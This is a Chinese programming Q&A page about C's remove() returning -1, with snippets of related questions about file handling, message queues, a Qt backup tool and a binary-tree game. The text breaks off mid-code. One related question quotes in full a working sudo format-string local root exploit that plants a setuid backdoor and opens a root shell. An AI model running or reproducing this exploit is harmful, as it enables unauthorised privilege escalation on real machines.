C语言remove函数返回-1

在C语言中调用remove函数,调用失败返回的是-1,路径没有问题,请问该怎么办?

c

2个回答

没人回答吗。。是我的权限不够。。。

检查一下路径对不对,如果是winxp以上的话,用管理员权限运行你的程序。另外调用int iErr = GetLastError();看看有没有错误码。有的话看看是什么内容。

Csdn user default icon
上传中...
上传图片
插入图片
抄袭、复制答案,以达到刷声望分或其他目的的行为,在CSDN问答是严格禁止的,一经发现立刻封号。是时候展现真正的技术了!
其他相关推荐
c语言 文件 remove()函数出现permission denied
写了个程序,要删除E:\\hugo.txt,确保文件已关闭,不是只可读,为什么仍然出现了permission denied,该怎么解决
remove和rename函数没用了??
这个rename和remove函数为什么会失效? if(num==3) { /*删除图书*/ fpx=fopen("d:\\mywork\\book.txt","ab+"); fpy=fopen("d:\\mywork\\tushu.txt","wb+"); printf("请输入需要删除图书的编号:\n"); scanf("%d",&bianhao); for(i=0; i<bookshu; i++) { fread(&book[i],sizeof(struct Book),1,fpx); } k=i;//k为书本数目+1 for(i=0; i<k; i++) { if(book[i].bianhao==bianhao) { continue; } else { fwrite(&book[i],sizeof(struct Book),1,fpx); } } i=0; bookshu=bookshu-1; printf("删除图书成功!\n"); fclose(fpx); fclose(fpy); remove("d:\\mywork\\book.txt"); rename("d:\\mywork\\tushu.txt","D:\\mywork\\book.txt"); }
如何用C语言删除一个文件?
如何用C语言删除一个文件?想用remove函数。从键盘上输入要删除的文件名。可不知如何编写,大师可否写个例子啊。
C语言 应该怎么修改宏定义 在函数5执行之后,打印错误error 函数6也能执行
这是函数5 static char * test_replace() { Link_t head; head = LinkTable_new(); Link_t temp3 =Link_replace(head, "101", "cpp101"); int number4; if(temp3 != NULL) { number4 =2; } else { number4 =0; } if(number4 == 1) { passed++; } else { failed++; } tcut_assert("error, number4 != 1", number4 == 1); return 0; } 这是函数6 static char * test_remove() { Link_t head; head = LinkTable_new(); Link_t temp = Link_remove(head, "102"); Link_t temp2 = Link_remove(head, "102"); int number5; if(temp2 == NULL) { number5=1; } if(head == temp) { LinkTable_free(head); } else { free(temp); LinkTable_free(head); } if(number5 == 1) { passed++; } else { failed++; } tcut_assert("error, number5 != 1", number5 == 1); return 0; } static char * all_tests() { tcut_run_test(test_replace); tcut_run_test(test_remove); return 0; } int main(int argc, char **argv) { printf("\n----------- Begin Unit Test ----------\n"); Test_LinkTable( ); char *result = all_tests(); printf("Tests run: %d\n", nr_tests); if (result != 0) { printf("%s\n", result); printf("Error:The test doesn't pass normal"); } else { printf("ALL TESTS PASSED\n"); } printf("\n------------End Unit Test -------------\n"); printf("Passed: %d 个 \n",passed); printf("Failed: %d 个 \n",failed); printf("\n----------------------------------------\n"); return result != 0; } 宏定义 :#define tcut_assert(what, test) do { if (!(test)) return what;} while (0) #define tcut_run_test(test) do { char *what = test(); nr_tests++; if (what) return what; } while (0) 应该怎么改宏定义 让函数5不执行 函数 6可以执行
请教一个在Linux Ubuntu12.04下通过sudo_debug函数的格式化字符串漏洞来获取root权限的问题
我于网上抄了一个大佬的代码,[源码地址](https://www.exploit-db.com/exploits/25134 "") 代码如下: ``` #include <sys/resource.h> #include <sys/utsname.h> #include <gnu/libc-version.h> #include <stdlib.h> #include <unistd.h> #include <stdio.h> #include <sys/time.h> #include <sys/stat.h> #include <string.h> #include <sys/wait.h> #define OFFSET 65000 #define NUM_THREADS 0 /* files that we create on disk */ #define BACKDOOR "e.c" #define BD_COMPILED "e" #define SUDO_ASKPASS "e.sh" extern char **environ; struct utsname ver; void *kill_sudo(); void *pop_shell(); void *set_env(); int is_glibc_vuln(); int is_sudo_vuln(); int write_backdoor(); /* hardcoded path to sudo */ const char sudo[] = "/usr/bin/sudo\0"; char s_version[20]; /* vuln versions of sudo */ char vuln_sudo_versions[4][20] = { {"1.8.0"}, {"1.8.1"}, {"1.8.2"}, {"1.8.3"} }; /* vuln versions of glibc */ char vuln_glibc_versions[4][20] = { {"2.14.90"}, }; int main(int argc, char *argv[]) { struct rlimit rara; int status; char ready; uname(&ver); printf("[+] Targeting release: %s\n", ver.release); if (is_glibc_vuln()){ if(is_sudo_vuln()){ if (write_backdoor()){ printf("[+] Press enter when ready..."); scanf("%c", &ready); }else{ exit(0); } }else{ exit(0); } }else{ exit(0); } // ulimited stack rara.rlim_max = rara.rlim_cur = -1; setrlimit(RLIMIT_STACK, &rara); pid_t pid; if((pid = fork()) < 0) { printf("[-] An error occurred while forking sudo\n"); return -1; } else if(pid == 0){ set_env(); kill_sudo(); }else{ wait(&status); if (WIFEXITED(status)) { sleep(1); pop_shell(); } } } int is_glibc_vuln(){ int i, returnval = -1; for (i = 0; i < 4; i++){ if (strcmp(gnu_get_libc_version(), vuln_glibc_versions[i]) == 0){ printf("[+] Found vuln glibc version: %s\n", gnu_get_libc_version()); returnval = 1; } } return returnval; }; int is_sudo_vuln(){ int i, returnval = -1;; FILE *fp; char path[20]; char sudo_ver_cmd[50]; snprintf(sudo_ver_cmd, sizeof(sudo)+3,"%s -V", sudo); fp = popen(sudo_ver_cmd, "r"); if (fp == NULL) { printf("[-] Failed to get sudo's version\n[-]Exiting.." ); exit(0); } fgets(path, 21, fp); memmove (s_version, path+13,5); for (i = 0; i < 4; i++){ if (strcmp(s_version, vuln_sudo_versions[i]) == 0){ printf("[+] Found a vuln sudo version: %s\n", s_version); returnval = 1; } } return returnval; }; int write_backdoor(){ int returnval = 1; char askpass[100], compile_bd[100]; char bdcode[] = "#include <stdio.h>\r\n" "#include <stdlib.h>\r\n" "int main(int argc, char **argv){\r\n" " printf(\"[+] Getting root..!\\n\");\r\n" " setresuid(0,0,0);\r\n" " printf(\"[+] Cleaning system.\\n\");\r\n" " remove(\"e\"); remove(\"e.c\"); remove(\"e.sh\");\r\n" " printf(\"[+] Launching root shell!\\n\");\r\n" " system(\"/bin/sh\");\r\n" " exit(0);\r\n" "}\r\n"; FILE *fp = fopen(BACKDOOR,"wb"); if (fp == NULL) { printf("[-] Failed to write backdoor on the target, check your permissions\n" ); returnval = -1; }else{ printf("[+] Writing backdoor: %s\n", BACKDOOR); } fwrite(bdcode, 1, sizeof(bdcode)-1, fp); fclose(fp); memset(compile_bd, 0x00, sizeof(compile_bd)); snprintf(compile_bd, sizeof(BACKDOOR)+sizeof(BD_COMPILED)+17,"/usr/bin/gcc %s -o %s", BACKDOOR, BD_COMPILED); printf("[+] Compiling backdoor: %s\n", BD_COMPILED); fp = popen(compile_bd, "r"); if (fp == NULL) { printf("[-] Failed to compile the backdoor, check the gcc path\n" ); returnval = -1; } fclose(fp); memset(askpass, 0x00, sizeof(askpass)); snprintf(askpass, sizeof(BD_COMPILED)*2+39,"#!/bin/sh\nchown root:root %s\nchmod 4777 %s\n", BD_COMPILED, BD_COMPILED); fp = fopen(SUDO_ASKPASS,"w"); if (fp == NULL) { printf("[-] Failed to write backdoor on the target, check your permissions\n" ); returnval = -1; }else{ printf("[+] Writing SUDO_ASKPASS file: %s\n", SUDO_ASKPASS); } fwrite(askpass, 1, sizeof(askpass)-1, fp); fclose(fp); chmod(SUDO_ASKPASS, 0755); return returnval; }; void *set_env(){ int i = 0; char ld_preload_evar[OFFSET] = "LD_PRELOAD="; char user_details[OFFSET] = {0x1f, 0x46, 0x01, 0x40}; char sudo_askpass_evar[40]; for (i=0; i<(OFFSET/4); i++){ memcpy(user_details+(i*4), user_details, sizeof(int)); } memmove (ld_preload_evar+11, user_details , sizeof(user_details)); memset(sudo_askpass_evar, 0x00, sizeof(sudo_askpass_evar)); snprintf(sudo_askpass_evar, sizeof(SUDO_ASKPASS)+13,"SUDO_ASKPASS=%s", SUDO_ASKPASS); // set our environment putenv(ld_preload_evar); putenv(sudo_askpass_evar); }; void *kill_sudo(){ char fmtstring[] = "%20$08n %*482$ %*2850$ %1073741824$"; char *args[] = { fmtstring, "-D9", "-A", "", NULL}; // trigger the vuln execve(sudo, args, environ); }; void *pop_shell(){ // set our environment unsetenv("LD_PRELOAD"); unsetenv("SUDO_ASKPASS"); char *exploit_args[] = { BD_COMPILED, NULL }; execve(BD_COMPILED, exploit_args, environ); }; ``` 这是别人运行后的截图 ![图片说明](https://img-ask.csdn.net/upload/201912/25/1577248386_581331.png) 这是我运行的截图 ![这是我运行的截图](https://img-ask.csdn.net/upload/201912/25/1577209594_514497.png) 可以看出来我的没有运行成功,我是自己复制下来的,完全没有改动,sudo版本也是相同的,我实在是不知道原因何在,只能来求助各位大佬了
消息队列msgget函数返回值一直都是0,创建的消息队列只在第一次开机正常运行
使用msgget函数创建了一个消息队列,但是函数msgget无论每次运行都是返回0. 而且在删除消息队列后再次创建时,使用ipcs -q 命令查看时,可以看到mqid是32767,但是msgget函数的返回值依然是0,并且此时消息队列无法正常收发信息,在函数msgsnd处报错individual argument。此时重启虚拟机,再次运行不会报错,mqid依然是0 #define MAX_SEND_SIZE 80 struct mymsgbuf{ long mtype; char mtext[MAX_SEND_SIZE]; }; void send_message(int qid,struct mymsgbuf *qbuf,long type,char *text); void read_message(int qid,struct mymsgbuf *qbuf,long type); void remove_queue(int qid); void change_queue_mode(int qid,char *mode); void usage(); int main(int argc,char *argv[]){ key_t key; int msgqueue_id; struct mymsgbuf qbuf; if(argc ==1) usage(); /*Create unique key via call to ftok()*/ key = ftok(".", 2 ); if( msgqueue_id = msgget( key,IPC_CREAT | 0660) == -1){ perror("msgget\n"); exit(1); } printf("message queue id = [%d]\nkey = %d",msgqueue_id,key); switch(tolower(argv[1][0])) { case 's': if( argc < 4 ){ usage(); break; } send_message(msgqueue_id,(struct mymsgbuf*)&qbuf,atol(argv[2]),argv[3]); break; case 'r': if( argc < 3 ){ usage(); break; } read_message(msgqueue_id,&qbuf,atol(argv[2])); break; case 'm': if( argc < 3 ){ usage(); break; } change_queue_mode(msgqueue_id,argv[2]); break; case 'd': remove_queue(msgqueue_id); break; default: usage(); } return (0); } void send_message(int qid,struct mymsgbuf *qbuf,long type,char *text) { //Send a message to the queue printf("Sending a message ...\n"); qbuf->mtype = type; strcpy(qbuf->mtext,text); if((msgsnd(qid,(struct msgbuf *)qbuf,strlen(qbuf->mtext)+1,0)) == -1){ perror("msgsnd"); exit(1); } } void read_message(int qid,struct mymsgbuf *qbuf,long type){ //Read a message from the queue printf("Reading a message ...\n"); qbuf->mtype = type; msgrcv(qid,(struct msgbuf*)qbuf,MAX_SEND_SIZE,type,0); printf("Type:%ld\nText:%s\n",qbuf->mtype,qbuf->mtext); } void remove_queue(int qid){ msgctl(qid,IPC_RMID,0); } void change_queue_mode(int qid,char *mode) { struct msqid_ds myqueue_ds; //Get current info msgctl(qid,IPC_STAT,&myqueue_ds); //Convert and load the mode sscanf(mode,"%ho",&myqueue_ds.msg_perm.mode); //Update the mode msgctl(qid,IPC_SET,&myqueue_ds); } void usage(void) { fprintf(stderr,"msgtool -A utility for tinkering with msgqueues\n"); fprintf(stderr,"Usage:msgtool (s)end<type> <messagetext>\n"); fprintf(stderr,"(r)ecv <type>\n"); fprintf(stderr,"(d)elete\n"); fprintf(stderr,"(m)ode <octal mode>\n"); exit(1); } ``` ``` ``` ```
qt 运行出来的框图有残缺
# cpp文件 ``` #include "vsbak.h" #include "ui_vsbak.h" #include <QSettings> #include <QFileDialog> #include<QTime> #include<QtDebug> #include <QMessageBox> #define CONFIG_FILE "config.ini" const QString EXCLUDE_FILE = "/home/hu/project2";// 這個文件沒啥用 Vsbak::Vsbak(QWidget *parent) : QWidget(parent) , ui(new Ui::Vsbak) { ui->setupUi(this); QSettings *configIniRead = new QSettings(CONFIG_FILE, QSettings::IniFormat); dir_src = configIniRead->value("/main/bak_src").toString(); dir_dest = configIniRead->value("/main/bak_dest").toString(); // 配置文件里面有目标地址 gpg_key = configIniRead->value("/main/gpg_key").toString(); exclude_from = configIniRead->value("exclude/exclude").toString(); delete configIniRead; // init bash terminal //QProcess可以用于启动外部程序 cmd = new QProcess(this);// 因为与父类直接释放内存 // Sets the working directory to dir. QProcess will start the process in this directory. //The default behavior is to start the process in the working directory of the calling process. cmd->setWorkingDirectory(dir_src); //This signal is emitted when the process has made new data available //through its standard output channel (stdout). It is emitted regardless of the current read channel. connect(cmd, &QProcess::readyReadStandardOutput, this, &Vsbak::on_readyReadStandardOutput); connect(cmd, &QProcess::readyReadStandardError, this, &Vsbak::on_readyReadStandardError); ui->lineEdit->setText(dir_src); ui->lineEdit_2->setText(dir_dest); // 在ui里直接设置这个地址 // init comboBox init_comboBox(); // init radiobutton: choice full ui->radioButton->setChecked(true); ui->checkBox->setChecked(false); ui->checkBox_2->setEnabled(false); ui->checkBox_3->setEnabled(false); } /* * 设置最大可见数目为5,是不是不合理? */ void Vsbak::init_comboBox() // 找压缩好的文件 Combobox 下拉菜单 { /* * 1. 用一个对象进入dir-dest目录下 * 2. 过滤掉包含后追的文件 * 3. 获取被过滤的文件理解 */ // find all backup.tar.gz files //The QDir class provides access to directory structures and their contents. 不仅能看到结构,还可以看到目录 QDir *curDir = new QDir(dir_dest); //The QStringList class provides a list of strings. //可以让你提取一个新的列表只包含这些字符串包含一个特定的字符串(或匹配特定正则表达式) QStringList filter; // 过渡成一个目录 filter << "*.tar.gz" << "*.tar.gz.gpg"; curDir->setNameFilters(filter); // 过滤掉特定的目录下的文件 //Returns a list of QFileInfo objects for all the files and directories in the directory //QDir::entryInfoList()会获取该目录下所有目录和文件的QFileInfo对象的列表 QList<QFileInfo> *tarFileInfo = new QList<QFileInfo>(curDir->entryInfoList(filter)); /* * dir_dest 里面存放的其实都是被压缩的文件,所以用上面的后缀直接进行过滤 * 1. 设置最大的可见数目为5 * 2. 看目录里面有多少,然后放入这个comboBox * 3. 获取被过滤的文件 * 4. 按照顺序放入到combobox中 */ ui->comboBox->clear(); ui->comboBox->setMaxVisibleItems(5); // 最大可见数目 5 //The string will be inserted as the first item in the combobox. ui->comboBox->setInsertPolicy(QComboBox::InsertAtTop); for (int i=0; i< tarFileInfo->count(); i++)// count()只是计算里面的数量,tarFileinfo实际上是一个文件列表 ui->comboBox->addItem(tarFileInfo->at(i).fileName()); } Vsbak::~Vsbak() { delete ui; // 有何作用 if(cmd->state() == QProcess::Running){ cmd->terminate(); cmd->waitForFinished(); } } void Vsbak::on_readyReadStandardOutput() { // QString out = QString::fromLocal8Bit(cmd->readAllStandardOutput()); // ui->label_4->setText(out); } void Vsbak::on_readyReadStandardError() { QMessageBox::information(0, "Error", cmd->readAllStandardError()); } // change dir_src void Vsbak::on_toolButton_clicked() { /* * 1. 或许dir_src的文件目录名称 * 2. 将dir_src的文件目录名写到lineEdit上面 * 3. 更新配置文件里面的信息 * 4. 设置工作目录 * */ QString dirname; dirname = QFileDialog::getExistingDirectory(this, tr("Open Directory"), dir_src, QFileDialog::ShowDirsOnly | QFileDialog::DontResolveSymlinks); if(dirname.isEmpty()) return; else { dir_src = dirname; ui->lineEdit->setText(dir_src); QSettings *configIniWrite = new QSettings(CONFIG_FILE, QSettings::IniFormat); configIniWrite->setValue("/main/bak_src", dir_src); delete configIniWrite; cmd->setWorkingDirectory(dir_src); ui->label_4->setText("change source dir sucess!"); } } // change dir_dest void Vsbak::on_toolButton_2_clicked() { QString dirname; // getExistingDirectory 只获取文件夹 dirname = QFileDialog::getExistingDirectory(this, tr("Open Directory"), dir_dest, QFileDialog::ShowDirsOnly | QFileDialog::DontResolveSymlinks); if(dirname.isEmpty()) return; else { dir_dest = dirname; ui->lineEdit_2->setText(dir_dest); QSettings *configIniWrite = new QSettings(CONFIG_FILE, QSettings::IniFormat); configIniWrite->setValue("/main/bak_dest", dir_dest); delete configIniWrite; ui->label_4->setText("change dest dir sucess!"); } } int Vsbak::get_min(QDateTime curTime) { QSettings *configIniReadWrite = new QSettings(CONFIG_FILE, QSettings::IniFormat); int lastTime = configIniReadWrite->value("/main/last_time").toInt();// 将值转化成整形 configIniReadWrite->setValue("/main/last_time", curTime.toTime_t()); delete configIniReadWrite; int minDiff = (curTime.toTime_t()-lastTime) / 60 + 1; return minDiff; } void Vsbak::on_checkBox_clicked() { if(ui->checkBox->isChecked()){ ui->checkBox_2->setEnabled(true); ui->checkBox_3->setEnabled(true); } else{ ui->checkBox_2->setEnabled(false); ui->checkBox_3->setEnabled(false); } } /* * 3 个 String类型 * targz:time + full.tar.gz * cmd_find:find ./ -type f | grep -v \'Permission denied\' > TEPLIST * cmd_tar *目录列表 * * * */ void Vsbak::on_pushButton_clicked(){ // The QDateTime class provides date and time functions. // 调用QDatetime里面的一个函数,赋给另一个QDatetime的类型 QDateTime current_date_time = QDateTime::currentDateTime(); // 初始化三个String类型 QString targz, cmd_find, cmd_tar; //RadioButton presents an option button that can be toggled on (checked) or off (unchecked). //Radio buttons are typically used to select one option from a set of options. //Use isChecked() to see if a particular button is selected. if(ui->radioButton->isChecked()){ // 如果radiobutton 被选择了,那么就进行备份,如果没有就只输出时间 // Linux find命令用来在指定目录下查找文件。 // 将目前目录其其下子目录中所有一般文件列出 # find . -type f // Linux grep 命令用于查找文件里符合条件的字符串。 // -v 或 --revert-match : 显示不包含匹配文本的所有行。 // 反向查找。前面各个例子是查找并打印出符合条件的行,通过"-v"参数可以打印出不符合条件行的内容。 // ./ 表示当前目录的全路径 当前目录的全路径 没有这个 \'Permission denied\'???? //linux的命令,查找文件然后设置权限 // 这个是不管修改不修改,全部列出来 cmd_find = "find ./ -type f | grep -v \'Permission denied\' > TEPLIST";// 这个功能是什么呢 targz = current_date_time.toString("yyyy-MM-dd_hh.mm.ss") + ".full.tar.gz"; }else{ // 会替换掉前面的百分之1,替换规则是从小到大 //get_min是一个函数,看它具体怎么实现的,应该是循环遍历了current_date_time,找到最小???? int minDiff = get_min(current_date_time); // 获得是最小的查值 // 完成命令,把距离最新一次全部修改的文件单独列出来 cmd_find = QString("find ./ -mmin -%1 -type f | grep -v \'Permission denied\' > TEPLIST").arg(minDiff); targz = current_date_time.toString("yyyy-MM-dd_hh.mm.ss") + ".inc.tar.gz"; } // exclude from 是一个配置目录 // tar命令 //-v或--verbose 显示指令执行过程 // --totals 备份文件建立后,列出文件大小 //cmd_tar这是压缩tar的linux命令,将exclude里面的文件全部列出来,进行压缩 cmd_tar = QString("tar --verbose --totals --exclude-vcs %1 --files-from=TEPLIST -czf %2/%3").arg(exclude_from).arg(dir_dest).arg(targz);//?5 // 向调试器输出命令的执行结果,方便调试排错 qDebug()<< cmd_find << endl << cmd_tar<< endl; // 下面整个过程就是执行这个命令 QStringList cmd_pipe;// 初始化了一个String目录 cmd_pipe << "-c" << cmd_find; // 说明这个cmd-pipe已经变成了一个linux的cmd命令了 cmd->start("/bin/bash",cmd_pipe); // 开始一个程序 cmd->waitForFinished(); cmd->close(); cmd->start(cmd_tar);// cmd_tar 也变成了一个程序 cmd->waitForFinished(); cmd->close(); cmd->start("rm -f TEPLIST");// 强制删除teplist, teplist 就是临时文件 cmd->waitForFinished(); /*********** Encrypting*************/ // gpg-k 增加公共钥匙 if(ui->checkBox->isChecked()){ QString cmd_enc; QString cmd_isKey = "gpg -k " + gpg_key; cmd->start(cmd_isKey); cmd->waitForFinished(); QString out = QString::fromLocal8Bit(cmd->readAllStandardOutput());// 这个输出就不是很理解为什么 if(out.isEmpty()) // -o, --output FILE write output to FILE // c 说是使用对称加密,看起来很奇怪 cmd_enc = QString("gpg -c -o %1/%2.gpg %1/%2").arg(dir_dest).arg(targz); else // e 是加密数据 , 针对 用户 id 进行加密 cmd_enc = QString("gpg -e -r %1 -o %2/%3.gpg %2/%3").arg(gpg_key).arg(dir_dest).arg(targz); cmd->start(cmd_enc); cmd->waitForFinished(); if(false == ui->checkBox_2->isChecked()){ QString cmd_rm = QString("rm %1/%2.gpg").arg(dir_dest).arg(targz); cmd->start(cmd_rm); cmd->waitForFinished(); } if(false == ui->checkBox_3->isChecked()){ QString cmd_rm = QString("rm %1/%2").arg(dir_dest).arg(targz); cmd->start(cmd_rm); cmd->waitForFinished(); } /* * /home/hu/桌面/vsbak/backup/2019-11-13_19.38.57.full.tar.gz * */ // ui->comboBox->addItem(targz); init_comboBox(); } } void Vsbak::on_pushButton_2_clicked(){ QString targz = ui->comboBox->currentText(); if (targz.endsWith(".tar.gz.gpg")){ targz = targz.remove(".gpg"); QString cmd_enc; QString cmd_isKey = "gpg -k " + gpg_key; cmd->start(cmd_isKey); cmd->waitForFinished(); QString out = QString::fromLocal8Bit(cmd->readAllStandardOutput()); if(out.isEmpty()) cmd_enc = QString("gpg -d -o %1/%2 %1/%2.gpg").arg(dir_dest).arg(targz); else cmd_enc = QString("gpg -d -r %1 -o %2/%3 %2/%3.gpg").arg(gpg_key).arg(dir_dest).arg(targz); cmd->start(cmd_enc); cmd->waitForFinished(); } QString cmd_str = QString("tar -xvf %1/%2").arg(dir_dest).arg(targz); qDebug() << cmd_str; cmd->start(cmd_str); cmd->waitForFinished(); } ``` 上面是cpp文件 下面是 # h文件 #ifndef VSBAK_H #define VSBAK_H #include <QWidget> #include<QProcess> QT_BEGIN_NAMESPACE namespace Ui { class Vsbak; } QT_END_NAMESPACE class Vsbak : public QWidget { Q_OBJECT public: Vsbak(QWidget *parent = nullptr); ~Vsbak(); private slots: void on_readyReadStandardOutput(); void on_readyReadStandardError(); void on_toolButton_clicked(); void on_toolButton_2_clicked(); void on_pushButton_clicked(); void on_pushButton_2_clicked(); void on_checkBox_clicked(); private: Ui::Vsbak *ui; QProcess *cmd; QString dir_dest; QString dir_src; QString gpg_key; QString exclude_from; void init_comboBox(); int get_min(QDateTime curTime);// 获得整形 }; #endif // VSBAK_H 我运行之后出来的qt界面,原本是可以下拉选择的,但是都没有反映,这是为啥
关于二叉树动物问答数据,如何使用文件来构造出二叉树?
课程设计要求使用出文件能够记录住自己的二叉树,但自己在实现的时候有一些问题。 ``` #include<iostream> #include<cstdlib> #include<string> #include<fstream> #include<stack> #include"bintree.h" #include"useful.h" using namespace std; void ask_and_move(binary_tree_node<string>*& current_ptr); binary_tree_node<string>* beginning_tree(); void instruct(); void learn(binary_tree_node<string>*& leaf_ptr); void play(binary_tree_node<string>* current_ptr); void WriteHelp(binary_tree_node<string> *root,ofstream &outFile); bool IsQuestion(string s); void CreateHelp(binary_tree_node<string> *root,ifstream &inFile); ofstream of; ifstream if1; int main() { binary_tree_node<string>* animal_root_ptr; instruct(); animal_root_ptr = beginning_tree(); do play(animal_root_ptr); while (again("还要不要再玩一次?")); cout << "欢迎下次来玩~" << endl; //写入文件animal。dat中 of.open("E://game.dat",ios::out); WriteHelp(animal_root_ptr,of); return 0; } void instruct() { cout << "现在开始游戏吧" << endl; cout << "你脑海中想象一只动物,让我来猜一猜" << endl; } void ask_and_move(binary_tree_node<string>*& current_ptr) { cout << current_ptr->data();//输出问题 if (again("请回答:")) { current_ptr = current_ptr->left(); } else current_ptr = current_ptr->right(); } //创建二叉树 binary_tree_node<string>* beginning_tree(){ ifstream inFile("E://game.dat"); binary_tree_node<string>* root_ptr;//头节点指针 binary_tree_node<string>* child_ptr;//孩子节点指针 if(inFile==NULL) { cout<<"未找到已有的二叉树,构建默认的二叉树"<<endl; const string root_question("是哺乳动物吗?"); const string left_question("比猫大吗?"); const string right_question("在水里吗?"); //加问题 const string animal_1("袋鼠"); const string animal_2("老鼠"); const string animal_3("鱼"); const string animal_4("喜鹊"); //加动物 //根节点 root_ptr = new binary_tree_node<string>(root_question);//头节点指针指向新创建的节点问题 //左子树 child_ptr = new binary_tree_node<string>(left_question);//左孩子问题 child_ptr->set_left(new binary_tree_node<string>(animal_1)); child_ptr->set_right(new binary_tree_node<string>(animal_2)); root_ptr->set_left(child_ptr);//将根节点的左节点设置为子节点的左节点 //右子树 child_ptr = new binary_tree_node<string>(right_question); child_ptr->set_left(new binary_tree_node<string>(animal_3)); child_ptr->set_right(new binary_tree_node<string>(animal_4)); root_ptr->set_right(child_ptr);//将根节点的右节点设置为子节点的右节点 return root_ptr; } else { binary_tree_node<string>* root_ptr;//头节点指针 if1.open("E://game.dat",ios::in); CreateHelp(root_ptr,if1); if1.close(); return root_ptr; } } void learn(binary_tree_node<string>*& leaf_ptr) {//改成用文件 string guess_animal; string correct_animal; string new_question; guess_animal = leaf_ptr->data(); cout << "好吧,我不知道是什么,还是你告诉我吧?" << endl; getline(cin, correct_animal); cout << "现在请输入一个新的问题来区分 "; cout <<'['<<correct_animal<<']'<< " 和 " << '['<<guess_animal<<']' << endl; getline(cin, new_question); leaf_ptr->set_data(new_question); cout<<correct_animal << "," << new_question << endl; if (again("请回答")) {//如果回答的是正确的则做节点 leaf_ptr->set_left(new binary_tree_node<string>(correct_animal)); leaf_ptr->set_right(new binary_tree_node<string>(guess_animal)); } else { leaf_ptr->set_left(new binary_tree_node<string>(guess_animal)); leaf_ptr->set_right(new binary_tree_node<string>(correct_animal)); } } void play(binary_tree_node<string>* current_ptr) { cout << "按下回车开始游戏"; eat_line();//等待,直到按下回车 while (!current_ptr->is_leaf())//如果不是叶子节点就执行ask_and_remove()函数,因为是叶子节点就直接输出最后猜测的结果 ask_and_move(current_ptr); cout << ("是" + current_ptr->data()+"吧"); if (!again(",我猜对了吗?"))//询问是否猜对,否,将该动物添加到二叉树中 learn(current_ptr); else cout << "我猜对了,哈哈哈哈" << endl; } void WriteHelp(binary_tree_node<string> *root,ofstream &outFile) { if(root!=NULL) { outFile<<root->data()<<endl; WriteHelp(root->left(),outFile); WriteHelp(root->right(),outFile); } } void CreateHelp(binary_tree_node<string> *root,ifstream &inFile) { string s; inFile>>s; if(!IsQuestion(s)) { cout<<"123123"; root->set_data(s); return ; } cout<<"Aasd"; root = new binary_tree_node<string>(s); CreateHelp(root->left(),inFile); CreateHelp(root->right(),inFile); } bool IsQuestion(string s) { int a = s.find("?"); int b = s.find("?"); if(a==-1&&b==-1) return 0; else return 1; } ``` template<class Item> class binary_tree_node { public: typedef Item value_type; binary_tree_node(const Item& init_data = Item(), binary_tree_node* init_left = NULL, binary_tree_node* init_right = NULL) { data_field = init_data; left_field = init_left; right_field = init_right; } Item data() { return data_field; } binary_tree_node* left() { return left_field; } binary_tree_node* right() { return right_field; } void set_data(Item new_data) { data_field = new_data; } void set_left(binary_tree_node* new_left) { left_field = new_left; } void set_right(binary_tree_node* new_right) { right_field = new_right; } bool is_leaf() { return (left_field == NULL) && (right_field == NULL); } private: Item data_field; binary_tree_node* left_field; binary_tree_node* right_field; }; ``` #include<assert.h> #include<ctype.h> #include<iostream> #include<stdlib.h> using namespace std; void eat_line() { char next; do cin.get(next);//一直等待,直到按下回车 while (next!='\n'); } //传入一个数组 bool again(const char query[]) { char answer; do { cout << query << "[Yes or No]" << endl; cin >> answer; answer = toupper(answer);//这个表示变成大写 eat_line(); } while ((answer != 'Y') && (answer != 'N'));//如果输入的不是yes/no就继续询问 return (answer == 'Y');//返回输入的是否为yes,是返回true否则返回false } ``` ![图片说明](https://img-ask.csdn.net/upload/201912/18/1576644860_28372.png) 如果没有建立文件的话,是没有使用上的问题的 ![图片说明](https://img-ask.csdn.net/upload/201912/18/1576644906_6502.png) 但是在建立后,我设置了一些输出试图找出问题出现在哪里,但还是找不出问题所在。
C语言初学者提问,不会修改程序
可以运行,但是达不到目的,不会修改 程序代码: typedef struct /* 学生结构 */ { short status; /* 数据状态,0:正常 1:删除 */ char number[10]; /* 学号 */ char name[20]; /* 姓名 */ char sex[3]; /* 性别 */ int age; /* 年龄 */ char place; /* 籍贯 */ char department; /* 系别 */ char major; /* 专业 */ int classnumber; /* 班级 */ }StudentType; void AddData(void); /* 增加数据 */ void ChangeData(void); /* 修改数据 */ void SearchData(void); /* 查找数据 */ void ListData(void); /* 显示数据 */ void PackData(void); /* 删除数据 */ #include<stdio.h> /* 标准输入输出文件包含预处理命令 */ #include<string.h> /* 字符串文件含预处理命令 */ #include<ctype.h> /* 包含tolower()的原型 */ #include<stdlib.h> /* 标准库文件包含预处理命令 */ FILE*fp; /* 声明文件指针 */ void AddData(void) /* 增加文件数据 */ { StudentType student; /* 学生 */ char tag; /* 设置标志是否继续增加 */ student.status=0; /* 数据状态,0:正常 1:删除 */ do { printf("学生学号:"); scanf("%s,student.number"); /* 输入学号 */ printf("学生姓名:"); scanf("%s,student.name"); /* 输入姓名 */ printf("学生性别:"); scanf("%s,student.sex"); /* 输入性别 */ printf("学生年龄:"); scanf("%d,student.age"); /* 输入年龄 */ printf("学生籍贯:"); scanf("%s,student.place"); /* 输入籍贯 */ printf("学生系别"); scanf("%s,student.department"); /* 输入系别 */ printf("学生专业:"); scanf("%s,student.major"); /*输入专业 */ printf("学生班级:"); scanf("%d,student.classnumber"); /* 输入班级 */ fseek(fp,0, SEEK_END); /* 移动文件内部指针 */ fwrite(&student,sizeof(StudentType),1,fp); /* 将图书信息存入文件中 */ printf("继续添加吗(y/n):"); while (getchar() !='\n'); /* 跳过当前行 */ tag=getchar(); /* y,Y表示继续,N,n表示结束 */ tag=tolower(tag); /* 大写字母转化为小写字母 */ while (tag !='y' && tag !='n') { /* 非法输入时重新输入 */ printf("输入非法,重新输入(y/n):"); while (getchar() !='\n'); /* 跳过当前行 */ tag=getchar(); /* y,Y表示继续,N,n表示结束 */ tag=tolower(tag); /* 大写字母转化为小写字母 */ } }while (tag=='y'); /* 肯定回答时循环 */ } void ChangeData(void) /* 更新数据 */ { StudentType student; /* 学生 */ char number[20]; /* 学生学号 */ printf("输入要更改的学生学号:"); scanf("%s",number); /* 输入学生学号 */ rewind(fp); /* 使位置指针返回到文件开头 */ fread(&student,sizeof(StudentType),1,fp); /* 读入学生信息 */ while(!feof(fp)) { /* 文件未结束 */ if(strcmp(student.number,number)==0 /* 学生学号相同 */ && student.status==0 /* 数据状态正常,未作删除标志 */ )break; /* 查询成功 */ fread(&student,sizeof(StudentType),1,fp); /* 读入学生信息 */ } if (!feof(fp)) { /* 查询成功 */ 